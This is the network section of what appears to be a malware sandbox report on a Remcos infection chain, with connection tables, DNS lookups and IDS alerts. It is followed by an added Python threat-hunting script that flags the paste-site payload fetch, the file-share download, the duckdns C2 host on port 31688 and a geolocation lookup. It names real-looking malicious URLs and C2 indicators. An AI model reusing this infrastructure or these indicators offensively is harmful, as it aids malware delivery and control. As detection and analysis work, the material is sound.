–    | –           | 23.35.229.160:80     | www.microsoft.com      | AKAMAI-AS                  | DE | whitelisted
2104 | svchost.exe | 4.231.128.59:443     | –                      | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4    | System      | 192.168.100.255:138  | –                      | –                          | –  | whitelisted
3216 | svchost.exe | 172.211.123.248:443  | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
4380 | chrome.exe  | 108.181.20.35:443    | files.catbox.moe       | TELUS Communications       | CA | malicious
5216 | chrome.exe  | 239.255.255.250:1900 | –                      | –                          | –  | whitelisted
4380 | chrome.exe  | 142.251.173.84:443   | accounts.google.com    | GOOGLE                     | US | whitelisted
6544 | svchost.exe | 40.126.31.0:443      | login.live.com         | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 142.250.184.206
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
files.catbox.moe
  • 108.181.20.35
malicious
accounts.google.com
  • 142.251.173.84
whitelisted
login.live.com
  • 40.126.31.0
  • 20.190.159.68
  • 40.126.31.131
  • 20.190.159.128
  • 20.190.159.4
  • 40.126.31.3
  • 20.190.159.130
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
sb-ssl.google.com
  • 142.250.184.206
whitelisted
www.google.com
  • 172.217.16.196
whitelisted

Threats

PID  | Process        | Class                                | Message
4380 | chrome.exe     | Potentially Bad Traffic              | ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
7260 | firefox.exe    | Potentially Bad Traffic              | ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
7260 | firefox.exe    | Potentially Bad Traffic              | ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
2196 | svchost.exe    | Misc activity                        | ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
7748 | wscript.exe    | Potential Corporate Privacy Violation | ET INFO Pastebin-style Service (paste .ee) in TLS SNI
6816 | powershell.exe | Potential Corporate Privacy Violation | ET INFO Pastebin-style Service (paste .ee) in TLS SNI
2196 | svchost.exe    | Potentially Bad Traffic              | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196 | svchost.exe    | Misc activity                        | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2196 | svchost.exe    | Potentially Bad Traffic              | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196 | svchost.exe    | Misc activity                        | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
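The network side of the report is three different views of the same chain: DNS lookups attributed to the Dnscache svchost.exe (so the requesting process is invisible there), TLS connections carrying the SNI (files.catbox.moe, paste.ee) together with the owning process, and plaintext HTTP requests (the paste.ee fetch by wscript.exe, the geoplugin.net/json.gp lookup by the Remcos-hosting MSBuild.exe). The Python below is an added example, not ANY.RUN's or Suricata's code: it replays the report's indicators as constructed records and reproduces the logic of the ET alerts above, adding a process-aware rule for the non-standard C2 port 31688 and for the geolocation lookup. The resolved C2 address is a documentation-range placeholder because the excerpt does not show what wizz111.duckdns.org resolved to, and the benign records are constructed.

```python
"""Added example, not part of the ANY.RUN report: replays the report's network
indicators as constructed DNS, connection and HTTP records and flags them the
way the Suricata ET alerts above did, plus a process-aware check for the
Remcos C2 port and the geoplugin.net lookup."""
import re
from urllib.parse import urlparse

DYN_DNS = re.compile(r"\.(?:duckdns\.org|no-ip\.(?:com|org|biz)|ddns\.net)$", re.I)
PASTE_SITES = ("paste.ee", "pastebin.com")
FILE_SHARE_SITES = ("files.catbox.moe",)
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}
COMMON_PORTS = {53, 80, 443, 853}

# Constructed records.  Hosts, ports and process names come from the report;
# 203.0.113.10 is a documentation-range placeholder for the C2 address.
DNS_QUERIES = ["crl.microsoft.com", "wizz111.duckdns.org", "paste.ee",
               "client.wns.windows.com", "files.catbox.moe"]
CONNECTIONS = [  # (process, SNI or domain, ip, port)
    ("chrome.exe", "files.catbox.moe", "108.181.20.35", 443),
    ("svchost.exe", "client.wns.windows.com", "172.211.123.248", 443),
    ("MSBuild.exe", "wizz111.duckdns.org", "203.0.113.10", 31688),
]
HTTP_REQUESTS = [  # (process, method, url, status)
    ("firefox.exe", "GET", "http://detectportal.firefox.com/success.txt?ipv4", 200),
    ("wscript.exe", "GET", "http://paste.ee/d/jMxTnyJf/0", 301),
    ("MSBuild.exe", "GET", "http://geoplugin.net/json.gp", 200),
]


def in_domain(host, sites):
    """True if host equals or is a subdomain of one of sites."""
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in sites)


def hunt(dns, conns, http):
    """Return (source, rule, detail) findings over the three record types."""
    findings = []
    # DNS is attributed to the Dnscache svchost in the sandbox, so the
    # requesting process is only known from connection and HTTP records.
    for qname in dns:
        if DYN_DNS.search(qname):
            findings.append(("dns", "dynamic_dns_query", qname))
        if in_domain(qname, PASTE_SITES):
            findings.append(("dns", "paste_site_query", qname))
    for proc, host, ip, port in conns:
        if in_domain(host, FILE_SHARE_SITES):
            findings.append(("conn", "file_sharing_download", f"{proc} -> {host}"))
        if DYN_DNS.search(host):
            findings.append(("conn", "dynamic_dns_connection", f"{proc} -> {host}:{port}"))
        # A non-browser talking to a non-standard port is the cheapest signal
        # for the Remcos C2 (31688 here) and survives a change of C2 domain.
        if proc.lower() not in BROWSERS and port not in COMMON_PORTS:
            findings.append(("conn", "unusual_port", f"{proc} -> {ip}:{port}"))
    for proc, method, url, status in http:
        host = urlparse(url).hostname or ""
        if in_domain(host, PASTE_SITES):
            findings.append(("http", "paste_site_fetch", f"{proc} {method} {url} ({status})"))
        # The Remcos-hosting MSBuild.exe fetches geoplugin.net/json.gp, a
        # geolocation check; a browser doing so is unremarkable, a .NET build
        # tool doing so is not.
        if host == "geoplugin.net" and proc.lower() not in BROWSERS:
            findings.append(("http", "geolocation_lookup_by_nonbrowser", f"{proc} -> {url}"))
    return findings


if __name__ == "__main__":
    for src, rule, detail in hunt(DNS_QUERIES, CONNECTIONS, HTTP_REQUESTS):
        print(f"{src:4} {rule:32} {detail}")
```

The dynamic-DNS and paste-site rules are noisy on their own (both services have legitimate users); the combination that matters in this report is a script host or build tool, not a browser, being the process behind them.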